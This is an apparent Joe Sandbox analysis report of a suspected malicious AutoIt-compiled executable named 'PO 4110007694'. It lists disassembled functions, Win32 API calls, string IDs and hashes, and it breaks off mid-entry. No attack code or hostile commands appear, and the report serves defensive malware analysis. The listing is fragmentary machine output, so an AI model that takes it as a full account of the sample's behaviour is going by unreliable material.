                                                                    • Instruction Fuzzy Hash: 1D510C71900218EFDF119FA4DC4CBAE7BB9FB48320F21452AF911EB2A1D6759A41DB90
                                                                    Function 00C989D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C98AC1
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98AD2
                                                                    • CharNextW.USER32(0000014E), ref: 00C98B01
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C98B42
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C98B58
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98B69
                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C98B86
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00C98BD8
                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C98BEE
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C98C1F
                                                                    • _memset.LIBCMT ref: 00C98C44
                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C98C8D
                                                                    • _memset.LIBCMT ref: 00C98CEC
                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C98D16
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C98D6E
                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00C98E1B
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00C98E3D
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98E87
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98EB4
                                                                    • DrawMenuBar.USER32(?), ref: 00C98EC3
                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00C98EEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                    • String ID: 0
                                                                    • API String ID: 1073566785-4108050209
                                                                    • Opcode ID: 0e5af4c1ae6436225d3f386ea8a55dfe12029478bb877edf6755ca8c6cd6cc61
                                                                    • Instruction ID: 2023fc6d1e04e67e035bd1f328dbe128e76e5689a4b99182776a704d865916fc
                                                                    • Opcode Fuzzy Hash: 0e5af4c1ae6436225d3f386ea8a55dfe12029478bb877edf6755ca8c6cd6cc61
                                                                    • Instruction Fuzzy Hash: 22E15071900218ABDF209F61CC88FEE7B79EF06710F10815AF925AB290DF749A85DF60
                                                                    Function 00C9488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00C949CA
                                                                    • GetDesktopWindow.USER32 ref: 00C949DF
                                                                    • GetWindowRect.USER32(00000000), ref: 00C949E6
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C94A48
                                                                    • DestroyWindow.USER32(?), ref: 00C94A74
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C94A9D
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C94ABB
                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C94AE1
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00C94AF6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C94B09
                                                                    • IsWindowVisible.USER32(?), ref: 00C94B29
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C94B44
                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C94B58
                                                                    • GetWindowRect.USER32(?,?), ref: 00C94B70
                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00C94B96
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00C94BB0
                                                                    • CopyRect.USER32(?,?), ref: 00C94BC7
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00C94C32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                    • String ID: ($0$tooltips_class32
                                                                    • API String ID: 698492251-4156429822
                                                                    • Opcode ID: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
                                                                    • Instruction ID: 3ba6362a9ebd1603487721974658f93edaf4902a9c12d0b8bbdb96caa7e32bfa
                                                                    • Opcode Fuzzy Hash: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
                                                                    • Instruction Fuzzy Hash: 98B18B71608340AFDB08DF65C848F6ABBE4FF89310F00891DF5999B2A1DB70E946DB95
                                                                    Function 00C127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128BC
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00C128C4
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128EF
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00C128F7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00C1291C
                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C12939
                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C12949
                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C1297C
                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C12990
                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00C129AE
                                                                    • GetStockObject.GDI32(00000011), ref: 00C129CA
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C129D5
                                                                      • Part of subcall function 00C12344: GetCursorPos.USER32(?), ref: 00C12357
                                                                      • Part of subcall function 00C12344: ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
                                                                      • Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000001), ref: 00C12399
                                                                      • Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000002), ref: 00C123A7
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00C11256), ref: 00C129FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                    • String ID: AutoIt v3 GUI
                                                                    • API String ID: 1458621304-248962490
                                                                    • Opcode ID: 1c12b34e1f6b95c4e479453210e16a22cc29a7102dbc9331e06d42c292790ee7
                                                                    • Instruction ID: 36a95a6e0e416e18910d0fbcdf1fef13e74c282a2fcec3781027030047c3b06e
                                                                    • Opcode Fuzzy Hash: 1c12b34e1f6b95c4e479453210e16a22cc29a7102dbc9331e06d42c292790ee7
                                                                    • Instruction Fuzzy Hash: B5B15D75A0120ADFDB14DFA8DC89BED7BB4FB08311F10412AFA15E62E0DB749951EB50
                                                                    Function 00C93DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C93E6F
                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C93F2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                    • API String ID: 3974292440-719923060
                                                                    • Opcode ID: 92f08d53487651e838ead14eaf0a3d77c53aca0622311b63363b069ac1bcba15
                                                                    • Instruction ID: 724daed08608874cdea620bcff1b758ad5c0e8269cecbe590644d4039e485892
                                                                    • Opcode Fuzzy Hash: 92f08d53487651e838ead14eaf0a3d77c53aca0622311b63363b069ac1bcba15
                                                                    • Instruction Fuzzy Hash: B5A17E712143419BCF14EF11C86AE6AB3A5EF85314F10896CF8669B2D2DB31EE46EB41
                                                                    Function 00C6A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00C6A47A
                                                                    • __swprintf.LIBCMT ref: 00C6A51B
                                                                    • _wcscmp.LIBCMT ref: 00C6A52E
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C6A583
                                                                    • _wcscmp.LIBCMT ref: 00C6A5BF
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00C6A5F6
                                                                    • GetDlgCtrlID.USER32(?), ref: 00C6A648
                                                                    • GetWindowRect.USER32(?,?), ref: 00C6A67E
                                                                    • GetParent.USER32(?), ref: 00C6A69C
                                                                    • ScreenToClient.USER32(00000000), ref: 00C6A6A3
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00C6A71D
                                                                    • _wcscmp.LIBCMT ref: 00C6A731
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00C6A757
                                                                    • _wcscmp.LIBCMT ref: 00C6A76B
                                                                      • Part of subcall function 00C3362C: _iswctype.LIBCMT ref: 00C33634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                    • String ID: %s%u
                                                                    • API String ID: 3744389584-679674701
                                                                    • Opcode ID: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
                                                                    • Instruction ID: a7a594205270e2ef5bcf5874b72d1b072de87f47398d750be8c20f15755ca014
                                                                    • Opcode Fuzzy Hash: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
                                                                    • Instruction Fuzzy Hash: C9A1A271204706AFD724DF64C8C4BAAB7E8FF44355F108529F9A9E2150DB30EA56CF92
                                                                    Function 00C6AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00C6AF18
                                                                    • _wcscmp.LIBCMT ref: 00C6AF29
                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C6AF51
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00C6AF6E
                                                                    • _wcscmp.LIBCMT ref: 00C6AF8C
                                                                    • _wcsstr.LIBCMT ref: 00C6AF9D
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00C6AFD5
                                                                    • _wcscmp.LIBCMT ref: 00C6AFE5
                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C6B00C
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00C6B055
                                                                    • _wcscmp.LIBCMT ref: 00C6B065
                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00C6B08D
                                                                    • GetWindowRect.USER32(00000004,?), ref: 00C6B0F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                    • String ID: @$ThumbnailClass
                                                                    • API String ID: 1788623398-1539354611
                                                                    • Opcode ID: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
                                                                    • Instruction ID: c1674919f1cba2d620fa25357ba2bbf23d3284164b2e374cdd38d66e745e31c2
                                                                    • Opcode Fuzzy Hash: 093a49f1e1363f3b080d6f54fc995e049de3800f38a4b27b97b2bfef3ad7a424
                                                                    • Instruction Fuzzy Hash: 27819F71108305AFDB24DF50C8C5BAA7BE8EF44354F04846AFD95DA092DB30DE86CBA2
                                                                    Function 00C6ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                    • API String ID: 1038674560-1810252412
                                                                    • Opcode ID: e6485945ce771b4f22ea4f9092bc3559d8adb98e825f8cc210312c993f75b8ee
                                                                    • Instruction ID: 58bc55ff152e7416e6f49844a0abf58ae36b8b8b15332fd2e5ded1ea0ea231dc
                                                                    • Opcode Fuzzy Hash: e6485945ce771b4f22ea4f9092bc3559d8adb98e825f8cc210312c993f75b8ee
                                                                    • Instruction Fuzzy Hash: 0E314F31948209BBDB24FA51DE83FEE77A4AB11751F600629F412710D1EF526F44BE92
                                                                    Function 00C84FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00C85013
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00C8501E
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00C85029
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00C85034
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00C8503F
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00C8504A
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00C85055
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00C85060
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00C8506B
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00C85076
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00C85081
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00C8508C
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00C85097
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00C850A2
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00C850AD
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00C850B8
                                                                    • GetCursorInfo.USER32(?), ref: 00C850C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
                                                                    • Instruction ID: f6ce81bcb912f434c8cd074d4c0d078d78432c43b7034a2031eb985423f41b07
                                                                    • Opcode Fuzzy Hash: 0d4f1af851af7ce10f206a77b8b883df753a15724a29b89eab86581ca319132c
                                                                    • Instruction Fuzzy Hash: 7C3135B0D4831D6ADF109FB68C8999FBFE8FF04754F50452AA51CE7280DB7865008F95
                                                                    Function 00C9A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C9A259
                                                                    • DestroyWindow.USER32(?,?), ref: 00C9A2D3
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C9A34D
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C9A36F
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A382
                                                                    • DestroyWindow.USER32(00000000), ref: 00C9A3A4
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C10000,00000000), ref: 00C9A3DB
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C9A3F4
                                                                    • GetDesktopWindow.USER32 ref: 00C9A40D
                                                                    • GetWindowRect.USER32(00000000), ref: 00C9A414
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C9A42C
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C9A444
                                                                      • Part of subcall function 00C125DB: GetWindowLongW.USER32(?,000000EB), ref: 00C125EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 1297703922-3619404913
                                                                    • Opcode ID: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
                                                                    • Instruction ID: eb54e6acd056b769a94409930188bebc423471cbcea60941e9be9bbe000c6a98
                                                                    • Opcode Fuzzy Hash: 09f3ff83dd59b1d48e61159c122b016c85ac5f09dd0813102e62c25b5db3630d
                                                                    • Instruction Fuzzy Hash: 05717B71140205AFDB21CF28CC4DFAA7BE5FB89704F04452EF995872A1D7B1EA42DB92
                                                                    Function 00C9C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00C9C627
                                                                      • Part of subcall function 00C9AB37: ClientToScreen.USER32(?,?), ref: 00C9AB60
                                                                      • Part of subcall function 00C9AB37: GetWindowRect.USER32(?,?), ref: 00C9ABD6
                                                                      • Part of subcall function 00C9AB37: PtInRect.USER32(?,?,00C9C014), ref: 00C9ABE6
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C690
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C9C69B
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C9C6BE
                                                                    • _wcscat.LIBCMT ref: 00C9C6EE
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C9C705
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00C9C71E
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C735
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00C9C757
                                                                    • DragFinish.SHELL32(?), ref: 00C9C75E
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C9C851
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
                                                                    • Instruction ID: 699d5a08f81ea68494c248777850c8ae9ceccc9e3554aaa49f8ea66c7b43674f
                                                                    • Opcode Fuzzy Hash: 24356444f67ff6720d97c22d51f2849141e3c7fc5fa7990cb1f7b08019ab27ec
                                                                    • Instruction Fuzzy Hash: A0616F71108305AFCB01EF64DC89EAFBBF8EF89710F10092EF595961A1DB709A49DB52
                                                                    Function 00C94392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C94424
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C9446F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
                                                                    • Instruction ID: 160b4b51e247b86fa1a091898d2b9c330f98bde96dcc4a5d8b6c908409335d3b
                                                                    • Opcode Fuzzy Hash: f055d8d713340eb6cef3bb2e9d843943424fdf50e0de5a87f7acbf4051ffd902
